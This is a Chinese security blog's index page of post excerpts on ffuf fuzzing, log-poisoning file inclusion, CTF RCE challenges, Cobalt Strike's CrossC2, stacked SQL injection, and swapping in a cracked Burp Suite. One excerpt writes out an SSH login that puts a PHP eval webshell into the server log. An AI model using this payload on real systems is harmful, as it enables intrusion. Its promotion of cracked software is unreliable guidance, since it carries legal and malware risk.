摘要:
对FFUF的一些常用命令做一下笔记,原文 0x00 Download https://github.com/ffuf/ffuf 0x01 基础参数 -u 指定URL 添加FUZZ字样,则代表FUZZ这个位置 -w 设置字典 多字典: ./ffuf -u www.abc.com/FUZZ1/FUZZ2 阅读全文
摘要:
0x01 包含登录日志 一般我们都直接放在UA中,然后开始找中间件的日志,有时候可能会有找不到的情况。此时,如果对方服务器开启SSH服务的话,我们可以使用包含SSH日志的方式 如下操作: SSH连接: ssh '<?php eval($_POST['a'];?>'@192.168.72.152 对方 阅读全文
摘要:
其实年终总结早就写好了,只是一直没有发出来。思来想去,还是觉得应该发到博客上记录一下我的这一年。 2021 0x01 破茧 破茧,即冲出束缚,认知新的世界。 在2021年以前,我想我的网安学习无异于织茧,慢慢积累知识却也把自己封锁在了那些知识当中。直到今年四月的一天,学长在群里突然问了一句:有没 阅读全文
摘要:
最近在给社团的同学们出RCE部分的题,我就在想能不能出的有意思点,于是有了这道题目: R C E to RCE 第一次出这种类型的题,借用了CTFSHOW的过滤 正如我之前在线下分享的时候说过的一句话,做CTF题有时候需要有题目理解能力,很多时候从题目的名称都能窥探到这个题目的大概方向。为了这句话, 阅读全文
摘要:
对于此类问题,我们可以重新构建: docker-compose up -d --build 阅读全文
摘要:
每月更新 1/1 嘻嘻 前置知识 代码执行(Remote Code Excution) 应用程序中提供了一些可以将字符串作为代码执行的函数,如PHP中的eval()函数,可以将函数中的参数当做PHP代码执行。如果这些函数的参数控制不严格,可能会被利用,造成任意代码执行。 命令执行(Remote Co 阅读全文
摘要:
速读本文: 构造方法名要跟类名一致 构造方法内调用构造方法,使用this(); public class circle { public double r; public String colour; public static final double pi=3.14; public circle 阅读全文
摘要:
Cobalt Strike 安装Cross C2 已经一个月没更新了,那就给自己一个台阶吧,准备每个月更新一篇 0x01 下载 https://github.com/gloxec/CrossC2/releases/tag/v3.0.1 根据你的需求来 但是根据官方介绍,似乎你需要下载第二个压缩包,并 阅读全文
摘要:
Kali Linux更换破解版的burpsuite 1.下载jdk版本:链接:https://pan.baidu.com/s/1G_R46hYrap1wQHqmwbootg 提取码:pa4o 2. cd /usr/local mkdir java 复制文件到你创建的这个目录解压缩 cd jdk-8u 阅读全文
摘要:
堆叠注入 题目:BUUCTF[强网杯 2019]随便注 0x01 原理 将多个语句一起进行查询,比如 select * from users;show databases; 产生这种注入的原理也很简单,是由于PHP mysql_multi_query()这个函数支持多个SQL语句同时执行,只需要使用 阅读全文